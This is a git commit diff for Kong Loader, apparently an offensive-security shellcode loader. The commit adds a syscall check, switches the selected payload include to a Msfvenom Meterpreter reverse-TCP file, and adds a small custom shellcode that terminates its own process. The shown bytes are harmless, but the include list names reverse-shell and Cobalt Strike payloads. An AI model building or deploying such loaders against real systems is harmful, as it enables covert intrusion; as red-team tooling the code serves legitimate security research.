Added explicit checks to crash on direct syscalls, as these are not supported yet.

This commit is contained in:
Tijme Gommers
2024-10-14 15:41:21 +02:00
parent e0a4f4ca7d
commit 765a42834e
5 changed files with 52 additions and 6 deletions
Binary file not shown.
+1 -1
View File
@@ -19,4 +19,4 @@ clean:
rm -f ./dst/$(TARGET).*
./dst/$(TARGET).x64.exe:
$(CC_X64) ./src/$(TARGET).c -o ./dst/$(TARGET).x64.exe -masm=intel -I inc -ldbghelp
$(CC_X64) ./src/$(TARGET).c -o ./dst/$(TARGET).x64.exe -masm=intel -I inc -ldbghelp -lkernel32 -luser32 -lntdll -lole32 -loleaut32
+4 -3
View File
@@ -76,7 +76,8 @@
*
* Our custom shellcode is loaded from `Shellcode.c` for easy adjustability.
*/
#include "shellcode/Custom-Storage-1.c" // Working
// #include "shellcode/Custom-Storage-1.c" // Working
// #include "shellcode/Custom-Syscall-1.c" // Working
// #include "shellcode/Custom-ArgumentOnStack-1.c" // Working
// #include "shellcode/Custom-AccessViolation-1.c" // Working
// #include "shellcode/Custom-ArgumentAsString-1.c" // Working
@@ -85,7 +86,7 @@
// #include "shellcode/Msfvenom-WinExec-1.c" // Working
// #include "shellcode/Msfvenom-ShellReverseTCP-1.c" // Working? (from C:\ drive)
// #include "shellcode/Msfvenom-MeterpreterReverseTCP-2.c" // Working
// #include "shellcode/Msfvenom-MeterpreterReverseTCP-1.c" // Not working
#include "shellcode/Msfvenom-MeterpreterReverseTCP-1.c" // Not working
// #include "shellcode/Proprietary-CobaltStrike-StagelessHTTP-1.c" // Not working
// #include "shellcode/Donut-MessageBoxA-1.c" // Not working
@@ -211,7 +212,7 @@ void main(int argc, char** argv) {
PRINT_SUCCESS("Creating Payload Descriptor (PD) and the `%s` payload within it.", STATIC_SHELLCODE_NAME);
if (NT_SUCCESS(dwResult = CreatePayloadAndDescriptor((uint8_t*) &StaticShellcode, sizeof(StaticShellcode), (uint8_t*) &StaticPassword, sizeof(StaticPassword), STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED, &lpPD))) {
PRINT_SUCCESS("Succesfully created the Payload Descriptor (PD) with a size of %d bytes.", lpPD.dwPayloadSize);
PRINT_SUCCESS("Base address of payload is %p.", lpPD.lpPayload);
PRINT_SUCCESS("Base address of payload is 0x%p (ending at 0x%p).", lpPD.lpPayload, lpPD.lpPayload + lpPD.dwPayloadSize);
} else {
PRINT_FAILURE_AND_ABORT("Could not create the Payload Descriptor (PD) and the payload within it: 0x%X.", dwResult);
}
+9 -2
View File
@@ -180,7 +180,7 @@ char* GetFunctionNameFromAddress(uint8_t* lpAddress) {
if (!SymFromAddr(hProcess, (DWORD64) lpAddress, &dqDisplacement, lpSymbol)) {
PRINT_WARNING("SymFromAddr failed for 0x%p in GetCurrentProcess: 0x%X.", lpAddress, GetLastError());
SymCleanup(hProcess);
return "_unknown_";
return "_unknown_";
}
// Allocate memory for the function name
@@ -365,7 +365,7 @@ uint64_t GetBestEffortSizeOfByteSequence(ZydisDecodedInstruction* zdInstruction,
}
RETURN_RESULT:
PRINT_VERBOSE("GetBestEffortSizeOfByteSequence of %s located at %p resulted in: %d.", lpFunctionName, lpCurrentBD->lpLastKnownNextAddress, qwSizeToReturn);
PRINT_VERBOSE("GetBestEffortSizeOfByteSequence of %s located at 0x%p resulted in: %d.", lpFunctionName, lpCurrentBD->lpLastKnownNextAddress, qwSizeToReturn);
return qwSizeToReturn;
}
@@ -438,6 +438,13 @@ void EnrichByteDescriptor(ZydisDecodedInstruction* zdInstruction, ZydisDecodedOp
break;
/**
* Syscall
*/
case ZYDIS_MNEMONIC_SYSCALL:
PRINT_FAILURE_AND_ABORT("Syscalls have not yet been implemented");
break;
/**
* Call
*
+38
View File
@@ -0,0 +1,38 @@
/**
* Mozilla Public License (MPL) Version 2.0.
*
* Copyright (c) 2024 Tijme Gommers (@tijme).
*
* This source code file is part of Kong Loader. Kong Loader is
* licensed under Mozilla Public License (MPL) Version 2.0, and
* you are free to use, modify, and distribute this file under
* its terms. However, any modified versions of this file must
* include this same license and copyright notice.
*/
/**
* Predefined definitions
*/
#define STATIC_SHELLCODE_NAME "Custom-KitchenSink-1" // Name to be printed
#define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
#define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
/**
* The XOR password to use.
*/
static uint8_t StaticPassword[] = { 0xAA };
/**
* The shellcode to use.
*
* This is custom written shellcode. It calls NtTerminateProcess using a syscall
*/
static uint8_t StaticShellcode[] = {
// Setup syscall for NtTerminateProcess
0x4C, 0x8B, 0xD1, // mov r10, rcx ; Move rcx to r10 (for syscall convention)
0xB8, 0x2C, 0x00, 0x00, 0x00, // mov eax, 0x2C ; Syscall number for NtTerminateProcess
0xBA, 0xFF, 0xFF, 0xFF, 0xFF, // mov edx, 0xFFFFFFFF ; Handle for current process (-1)
0x48, 0x31, 0xF6, // xor rsi, rsi ; Exit status 0 (STATUS_SUCCESS)
0x0F, 0x05, // syscall ; Perform syscall
0xC3 // ret ; Return
};